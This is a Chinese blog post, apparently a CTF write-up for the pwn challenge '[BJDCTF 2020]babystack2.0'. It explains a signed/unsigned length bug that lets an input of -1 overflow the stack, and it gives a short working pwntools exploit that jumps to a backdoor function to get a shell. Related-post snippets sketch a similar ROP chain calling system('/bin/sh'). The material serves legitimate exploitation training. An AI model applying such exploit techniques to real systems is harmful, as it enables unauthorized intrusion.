NSSCTF刷题笔记pwn5——[BJDCTF 2020]babystack2.0

最新推荐文章于 2024-05-13 18:34:53 发布
最新推荐文章于 2024-05-13 18:34:53 发布
阅读量290 收藏
点赞数 2
分类专栏: pwn 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135939429
版权

首先问我们要一个数字,要小于10

然后再问我们要一个值

估计栈溢出就发生在第二个参数传入时

使用gdb动态调试,找到栈溢出的大小,ida提示是4

在gdb中,我们可以看到栈溢出的大小是16+8,24字节

而我们最多只能写入9个长度的数据

我们发现对比时nbytes是一个整数

在read中参数nbytes是一个无符号的整数

我可以传入一个-1

-1在无符号数中代表255

那么即可为我们写入255个数据,就完成栈溢出

from pwn import *
context(arch="amd64")

io = process("./pwn")
backdoor = 0x400726
payload = flat([b"A"*24,backdoor])


io.recv()
io.sendline(b"-1")
io.recv()
io.sendline(payload)
io.interactive()

qq_45692883
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
bjdctf_2020_babystack【BUUCTF】
qq_41696518的博客
08-26 601
bjdctf_2020_babystack
bjdctf_2020_babystack题解
OrientalGlass的博客
01-08 351
send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入。先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111。nbytes在buf下方,并且nbytes是qword类型,占8个字节。解释了为什么第一次send要使用字符串类型而不能直接发送int类型。不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪。再发送覆盖数据覆盖掉返回地址执行backdoor函数即可。首先输入一个足以覆盖掉返回地址的数字。
[BJDCTF 2020]babystack2.0 CTF-PWN
最新发布
m0_72904009的博客
05-13 146
[BJDCTF 2020]babystack2.0 CTF-PWN
bjdctf_2020_babystack
m0sway的博客
03-24 1552
bjdctf_2020_babystack WriteUp BUU_PWN
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 659
[buuctf]bjdctf_2020_babystack
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 189
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
NSSCTF刷题笔记pwn7——[watevrCTF 2019]Voting Machine 1
qq_45692883的博客
02-02 412
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
ciscn2023_烧烤摊儿 wp(python3)
Kata_Jhin的博客
05-29 580
ciscn2023_烧烤摊儿(python3)wp
BJDCTF 2020 babystack2.0
2301_79793667的博客
12-11 270
因为第二次所需要读取的数值的字节数大于10,第一次输入的值在第二次作为无符号整型,所以我们需要输入一个负数来同时满足第一次输入和第二次输入,可以输入-1。通过分析,我们发现第一次输入的值不能大于10,否则会退出程序,第一次输入的值将作为第二次通过read函数输入的buf的值的最大字节数。让我们输入数据,随便输入了几个数据,就被退出程序了,那我们检查一下附件,然后用ida打开。通过read函数栈溢出到后门函数的地址0x400726。那我们就用64位ida打开。首先打开环境,并下载附件。找到了后门函数的地址。
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 289
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值